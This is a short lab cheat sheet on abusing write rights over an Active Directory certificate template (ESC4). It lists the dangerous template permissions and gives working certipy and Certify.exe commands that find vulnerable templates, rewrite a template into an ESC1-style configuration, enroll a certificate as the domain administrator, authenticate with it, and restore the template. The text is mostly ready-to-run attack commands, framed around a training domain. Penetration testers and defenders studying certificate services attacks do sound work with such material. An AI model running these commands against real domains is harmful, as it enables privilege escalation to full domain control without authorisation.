ESC4 abuses write access over a certificate template. We modify the template into an ESC1-style configuration, enroll a privileged certificate, and restore the original template configuration.
Dangerous template rights
Owner
FullControl
WriteProperty
WriteOwner
WriteDacl
GenericWrite
GenericAll
Find ESC4
certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -vulnerable -enabled -stdout
Write vulnerable default configuration
certipy template -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -template ESC4 -write-default-configuration
Request privileged certificate
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC4 -upn administrator@ootw.local -sid '<ADMINISTRATOR_SID>' -out administrator
Restore template configuration
certipy template -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -template ESC4 -write-configuration ESC4.json -no-save
Authenticate
certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
Windows with Certify
Certify.exe manage-template --template ESC4 --supply-subject --client-auth --authorized-signatures 0 --quiet
Certify.exe enum-templates --template ESC4 --quiet
Certify.exe request --ca "dc01.ootw.local\OOTW-CA" --template ESC4 --upn Administrator --quiet
Notes
ESC4 only helps if the template is published by a CA or can be made publishable through another path. Modifying a template that no CA issues does not immediately produce a certificate.
Always save and restore the original configuration during labs. Template changes affect every principal that can enroll from that template.